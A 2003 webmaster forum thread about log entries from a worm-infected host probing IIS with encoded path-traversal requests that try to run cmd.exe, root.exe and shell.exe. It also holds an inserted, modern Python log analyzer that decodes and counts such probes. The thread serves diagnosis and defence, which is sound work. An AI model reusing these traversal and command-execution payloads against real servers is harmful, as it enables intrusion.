
Indy Library - Chinese Spambot?

strange entries in my log file


bashyam

6:19 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Hi,

I found these unrelated entries in my logs frequently... could anyone let me know what it is?
------------------------------------------------------------
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:10 -0400] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:11 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:12 -0400] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:13 -0400] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:14 -0400] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:15 -0400] "GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:18 -0400] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:19 -0400] "GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:20 -0400] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:21 -0400] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:22 -0400] "GET /iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:23 -0400] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:24 -0400] "GET /iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:25 -0400] "GET /msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:26 -0400] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:27 -0400] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:28 -0400] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:29 -0400] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:30 -0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:31 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:32 -0400] "GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:33 -0400] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:34 -0400] "GET /msdac/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:35 -0400] "GET /msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:36 -0400] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:37 -0400] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:46 -0400] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:47 -0400] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:48 -0400] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:49 -0400] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:50 -0400] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:51 -0400] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:52 -0400] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:53 -0400] "GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:54 -0400] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:55 -0400] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:56 -0400] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:57 -0400] "GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:00 -0400] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:06 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:10 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:11 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:12 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:13 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:15 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:16 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:18 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
------------------------------------------------------------

Thanks..

Balaji.

jrobbio

6:42 am on Apr 21, 2003 (gmt 0)

10+ Year Member



It's a Chinese spam bot. Please be more selective with the category you choose for your posts. This is the Google section.

kwngian

8:15 am on Apr 21, 2003 (gmt 0)

10+ Year Member



>It's a Chinese spam bot.

It is a "compromised" spam bot.

The IP address says it's Canadian.

Even the spammers have their day for having an unpatched Windows machine.

[edited by: kwngian at 10:26 am (utc) on April 21, 2003]

bashyam

8:51 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Thanks for your reply.

Also, sorry to post this at Google section... by mistake I did that.

Balaji.

sullen

9:12 am on Apr 21, 2003 (gmt 0)

10+ Year Member



Don't know where the Chinese spam bot idea came from - it's a machine infected with the Code Red / Nimda worm.

You can't block it. The best thing to do is look up the IP address to find out which company hosts the machine and then write to them.
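The diagnosis in this thread (a host infected with a Nimda / Code Red style worm scanning for IIS, nothing you can usefully block, report it to whoever hosts the address) can be checked and summarized from the log itself. The Python below is an added example for this thread, not code from WebmasterWorld or from any poster: it parses Apache combined-format lines like the ones quoted above, undoes the double-encoding and overlong-UTF-8 tricks the worm uses (%255c, %%35c, %25%35%63, %c0%af, %e0%80%af and friends) so the real target path becomes visible, and builds a per-source summary of probe counts, response codes and first/last timestamps, which is what an abuse report to the hosting company needs. The sample log is constructed to match the shape of the thread's excerpt (the scanning address is the one posted; 192.0.2.10 is a documentation address used for the one benign line). Function and label names are this example's own.

```python
import re
from collections import Counter, defaultdict

# Apache/NCSA combined log format, the shape of the lines quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: lines shaped like the thread's excerpt plus one ordinary request.
SAMPLE_LOG = """\
24.226.39.127 - - [21/Apr/2003:00:48:07 -0400] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:08 -0400] "GET /..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:48:09 -0400] "GET /_vti_bin/..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:05 -0400] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 306 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:14 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
24.226.39.127 - - [21/Apr/2003:00:49:17 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 404 6177 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.10 - - [21/Apr/2003:01:02:03 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

_PCT = re.compile(rb'%([0-9A-Fa-f]{2})')


def _percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX decoding; malformed escapes such as %qf stay literal."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def _fold_overlong_utf8(data: bytes) -> bytes:
    """Decode UTF-8 lead bytes the lenient way old IIS did, keeping only results that land
    in ASCII: this is what turns %c0%af into '/' and %c1%9c (or %c1%1c) into a backslash."""
    out, i, n = bytearray(), 0, len(data)
    while i < n:
        b = data[i]
        if b >= 0xC0:
            if b >= 0xFC:
                need, val = 5, b & 0x01
            elif b >= 0xF8:
                need, val = 4, b & 0x03
            elif b >= 0xF0:
                need, val = 3, b & 0x07
            elif b >= 0xE0:
                need, val = 2, b & 0x0F
            else:
                need, val = 1, b & 0x1F
            if i + need < n:
                for k in range(1, need + 1):
                    val = (val << 6) | (data[i + k] & 0x3F)  # continuation bits not validated, like IIS
                if val < 0x80:
                    out.append(val)
                    i += need + 1
                    continue
        out.append(b)
        i += 1
    return bytes(out)


def normalize_path(raw_path: str, max_rounds: int = 3) -> str:
    """Drop the query string, then repeat decode / overlong-fold / backslash-to-slash until
    stable, so %255c, %%35c and %25%35%63 all end up as a plain '/'."""
    data = raw_path.split('?', 1)[0].encode('latin-1', 'replace')
    for _ in range(max_rounds):
        decoded = _fold_overlong_utf8(_percent_decode_once(data)).replace(b'\\', b'/')
        if decoded == data:
            break
        data = decoded
    return data.decode('latin-1')


# Files the worm asks for: cmd.exe via traversal, or the root.exe/shell.exe copies it leaves.
WORM_TARGET_RE = re.compile(r'/(?:winnt/system32/cmd\.exe|root\.exe|shell\.exe)$', re.I)


def classify(raw_path: str):
    """Label a request as a worm probe, or None for ordinary traffic."""
    norm = normalize_path(raw_path)
    traversal = '/../' in norm or norm.startswith('../')
    target = WORM_TARGET_RE.search(norm) is not None
    if target and traversal:
        return 'unicode-traversal-probe'
    if target:
        return 'worm-target-probe'  # root.exe/shell.exe, or a traversal the decoder rejected
    if traversal:
        return 'path-traversal'
    return None


def analyze(log_text: str) -> dict:
    """Per-source summary: counts, kinds, status codes, user agents, first/last seen."""
    report = defaultdict(lambda: {'probes': 0, 'kinds': Counter(), 'statuses': Counter(),
                                  'user_agents': set(), 'first': None, 'last': None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m['path'])
        if kind is None:
            continue
        e = report[m['ip']]
        e['probes'] += 1
        e['kinds'][kind] += 1
        e['statuses'][m['status']] += 1
        e['user_agents'].add(m['ua'])
        e['first'] = e['first'] or m['ts']
        e['last'] = m['ts']
    return dict(report)


if __name__ == '__main__':
    for ip, e in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {e['probes']} probes, {e['first']} .. {e['last']}, "
              f"kinds={dict(e['kinds'])}, statuses={dict(e['statuses'])}, ua={sorted(e['user_agents'])}")
```

On a server that is not IIS every one of these requests should come back 400 or 404, as they do in the thread; the summary's status counts make that easy to confirm, and a 200 against one of these paths is the line that would actually need investigating. The decoder is deliberately as lenient as the old IIS one (it does not validate continuation bytes), which is what lets it see %c1%1c the way the worm's target would.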

bull

9:57 am on Apr 21, 2003 (gmt 0)

10+ Year Member



24.226.39.127 is not Chinese:
Cogeco Cable Inc. COGECOWAVE-1 (NET-24-226-0-0-1) 
24.226.0.0 - 24.226.127.255

Apart from this, Indy Library is a candidate blocked by many here: [webmasterworld.com...]

jan

jrobbio

10:13 am on Apr 21, 2003 (gmt 0)

10+ Year Member


The Chinese bot thing came from a site and I quote:
[quote]Originally, the Indy Library is a programming library which is available at http://www.nevrona.com/Indy or http://indy.torry.net under an Open Source license. This library is included with Borland Delphi 6, 7, C++Builder 6, plus all of the Kylix versions. Unfortunately, this library is hi-jacked and abused by some Chinese spam bots. All recent user-agents with the unmodified "Indy Library" string were of Chinese origin.[/quote]

sullen

12:03 pm on Apr 21, 2003 (gmt 0)

10+ Year Member



Righty - missed the "Indy Library" part - I was just going on the addresses it's trying to hit.

I would say contact the host is still the best advice though.
